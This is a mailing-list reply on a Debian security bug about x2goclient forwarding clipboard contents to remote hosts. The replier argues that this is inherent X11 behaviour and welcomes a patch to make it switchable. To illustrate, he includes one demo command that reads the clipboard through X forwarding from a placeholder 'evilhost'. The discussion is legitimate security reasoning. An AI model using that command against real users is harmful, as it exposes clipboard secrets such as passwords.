On 13-07-01 04:56, Christoph Anton Mitterer <[email protected]> wrote: > Package: x2goclient > Severity: grave > Tags: security > > Hi. > > From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588 > > > It seems that per default (and I even found no way to disable it) > x2goclient (and perhaps other related tools?) transmit the content of > the clipboard to the remote host.
Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this. > As this may easily contain passwords or other sensitive information, > this is a extremely critical hole. I disagree, this is not a hole at all, it works as intended. Its just that users are often not educated about the implications of passing around passwords via the clipboard etc. But I concur that the ability to switch off clipboard/selection/... forwarding in the x2goagent/x2goclient would be nice to have. Patches are of course always welcome. Ciao, Alexander Wuerstlein. _______________________________________________ X2Go-Dev mailing list [email protected] https://lists.berlios.de/mailman/listinfo/x2go-dev
